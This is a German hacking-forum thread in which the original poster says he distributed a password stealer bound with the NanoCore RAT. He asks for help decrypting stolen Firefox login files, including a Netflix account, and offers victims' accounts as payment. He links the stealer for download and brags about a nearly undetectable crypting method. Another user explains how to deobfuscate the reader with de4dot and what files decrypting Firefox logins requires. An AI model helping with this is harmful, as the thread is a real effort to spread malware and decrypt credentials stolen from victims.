hi,

ich hab hier was,was ich nicht entschlüsselt bekomme und auch nicht weiss wie.

könnte mir da bitte jemand helfen?

so sieht das ding aus:

"MEIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECB1jSl oGUgguBBj9oc4WWDFKqlMy0IiY9zJ+wpBS+FlEXeA="

bitte postet mir wie ihr das entschlüsselt habt und was es ist,falls das jemand hinkriegt.

gruß,:)

Von wo kommt das denn? Sieht nicht gerade nach nem Hash aus weil so viele nullen drin sind und die Länge komisch ist.

das ist der username von einen verschlüsselten netflix account,
und es handelt sich dabei um diese verschlüsselte datei:

https://ufile.io/mq6oi

da ist sogar auch noch das pw bei.

wer mir sagen kann wie man die datei entschlüsselt der kann auch den account behalten.

ich muss das wissen weil mich noch mehr solcher dateien erwarten.

wenn man die datei mit einen text editor öffnet kann man das verschlüsselte pw und username sehen - verschlüsselt.

ich dachte das isn hash.

oder nicht?

Würde mich auch interessieren, wo du die Zeichenkette her hast?

https://ufile.io/j9w44

diese datei muss heruntergeladen und entschlüsselt werden,
mit texteditor hatte der den usernamen den ich als beispiel wählte herausgenommen und dann dachte ich der eine teil da drinen sei einer von 2 hashes von username und pw.
sagt mir bitte wie man das entschlüsselt.
wenn man den hash so liest kliegt das schlimmer als die sprache klingonisch:D:cool:

"muss heruntergeladen [...] werden" ne, sorry ^^
die Frage, woher du den Hash hast ist noch immer ungeklärt. Mehr Infos wären hilfreich... Worum geht es? Woher die Zeichenkette?

wenn man die datei mit texteditor öffnet steht da eine einzige zeile.
und da drinen steht "encrypted username" und dann der hash den ich geschrieben hatte,
und nen hash für "encrypted password" in der zeile weiter rechts.
keine sorge ich schwöre die datei ist clean,die ist auch nur 595 bytes gross.

---------- Post added at 23:40 ---------- Previous post was at 23:06 ----------

vielleicht noch zur info:
ich habe die datei von einen pw stealer zugeschickt bekommen per email,
den ich zu testzwecken verteilt hatte,
gebunden mit nanocore den schon viele kennen,ist sehr stabil.
wenn ihr wollt dann stelle ich den stealer hier bei freehack rein.
der pw stealer schickt anhänge mit der email wo man sich die verschlüsselten dateien runterladen kann,
die firefox,chrome und andere browser chroniken beinhalten.
aber der pw reader also die datei die die verschlüsselte datei entschlüsseln soll,
funktioniert nicht vom tool und meckert rum.
aber wenn ich die verschlüsselte datei mit text editor öffne kommen 2 hashes raus für username und pw.
username hash hatte ich ja geschrieben...

wer mir als erstes hier beschreiben kann,wie ich das entschlüssele,
also welche/s programm/e ich dazu brauche/n werde.
oder welche einstellungen dazu und oder wie.
viel erfolg und schon mal danke.

gruß,

Jo, also man müsste schon die Verschlüsselungskomponente haben und reversen, nur den Ciphertext bringt null.

hier ist der password stealer:

https://ufile.io/lidrr

keine sorge ist clean,aber falls ihr mir nicht glaubt könnt ihr es ja auf sandbox

oder vmware testen oder was es noch so alles gibt.

ist leider auf türkisch das meiste aber man versteht das meiste an den bildern und einstellungen.

bei mir funktionert der pw reader nicht also der die datei entschlüsseln soll die per email kommt.

hab auch schon neu geladen. geht nicht.

ich habe windows 10 x64 home edition.

vielleicht kommt ja einer von euch dahinter wie man das manuell entschlüsselt.

es gibt immerhin was zu gewinnen,es ist mir also schon was wert:)

danke schonmal und gruß.

Du wirst ein bisschen von der Obfuscation vom "Login Data Reader" los wenn du die String decryption im net reactor 4 Part von de4dot deaktivierst (Zeile auskommentieren und selbst builden) und das da durch jagst, scheinbar ist die benutzte Version vom net Reactor zu neu für de4dot und das zu fixen wäre Aufwand.

Wenn man das getan hat findet man wenn man im source nach base64 sucht nur drei Stellen, eine habe ich mir näher angeguckt, da ist eine Verschlüsselung, Algo ist AES, Key steht dort statisch nur für den IV müsste man ne größere Routine reversen. Sieht machbar aus, ist mir aber gerade ehrlich gesagt für irgendnen ollen Acc zu viel Aufwand.

Edit: IV hab ich, entschlüsselt aber nicht korrekt, ist vielleicht etwas völlig anderes :D Könnte passieren dass da nachher noch mehr von mir kommt, ist irgendwie doch zu interessant^^

Edit2: Habe mir gerade mal ne VM aufgesetzt und das Tool gestartet... Der klaut dir nichts weiter als die "logins.json" aus dem Firefox Profil-Verzeichnis. Bin mir gerade nicht ganz sicher aber ich glaube die key3.db brauchst du auch. Alles was das tolle Tool macht ist die Datei in deinem Lokalen Profil zu ersetzen und eines der Nirsoft Tools zu starten. Badum tss...

ich hab ehrlich gesagt keine ahnung von string decription im net reactor und 4 part von de4dot.
kannst du das bitte fixen gORDon_vdLg ?
(https://free-hack.com/member.php?37037-gORDon_vdLg)oder jemand anderes?ist doch auch interesant und ne kleine herausforderung sowas zu entschlüsseln.
und belohnt wird man auch noch für den spass und man ist schlauer.:)
ich darf hier leider keine belohnungen schreiben aber wer es schafft der bekommt von mir
top accounts mit sehr hohen wert und wenn er die nicht will kann er viele andere sich aussuchen,
das machen wir dann über pm wenns soweit ist.
ich hab hier nämlich sehr viele log dateien die entschlüsselt werden müssten,wenn ich weiss von euch wie.
und hab auch noch ne fast FUD methode 5/67,bei virustotal,entwickelt mit dem pw stealer,
von hand gecryptet ohne crypter.
es wäre sehr schade wenn ich das nicht erfahre wie man das entschlüsselt.:(
danke für jede hilfe.

gruß,


Edit:

Zitat:

Alles was das tolle Tool macht ist die Datei in deinem Lokalen Profil zu ersetzen und eines der Nirsoft Tools zu starten. Badum tss...

also klaut der garnix willst du damit sagen?:(

geh mal auf rekings.com

da sind immer gute tools und clean und funktionierend und der black striker stealer v5.0 ist auf platz 1.

hast du dich vielleicht geiirt?

Was ich mit dem zweiten Edit sagen wollte ist dass das Tool gar nicht selbst die Logins verschlüsselt hat und es daher auch nichts bringt es weiter zu reversen. Nirsoft ist eine Firma die unter anderem durch ihre Passwort Recovery Tools relativ bekannt ist, dein Tool fügt die geklaute Logindatei bei dir ein sofern du den Firefox installiert hast, weil der Autor zu dämlich war die entschlüsselung der Firefox Logins selbst zu implementieren. Dann wird das Tool -> http://www.nirsoft.net/utils/web_browser_password.html entpackt und gestartet um die Logins zu entschlüsseln. Hat aber auf meiner VM nicht hingehauen. Und ich bin mir gerade nicht ganz sicher, aber ich glaube um Firefox Logins zu entschlüsseln wird auch noch die key3.db vom Vic benötigt und sofern vom Vic gesetzt auch ein Master Passwort.

ok danke,

ich verneige mich vor deinem wissen.:)

eigendlich schade,ich frag mich warum rekings.com son schrott anbietet,

und dann auch noch auf platz 1 stellt???

alle versionen scheinen so ungefähr zu arbeiten.

das ist entweder ein fehler von dir und mir und rekings.com,die meinung das der stealer nicht funzt,oder,oder

das ist voll die verarsche.

ich kann den stealer cube revovery 4.3 empfehlen,den gibts auch auf rekings.com.

es mangelt irgendwie an pw stealern in letzter zeit auf vielen hacker/cracker seiten.

oder ich bin nicht mehr acktuell....ich alte keule:):cool: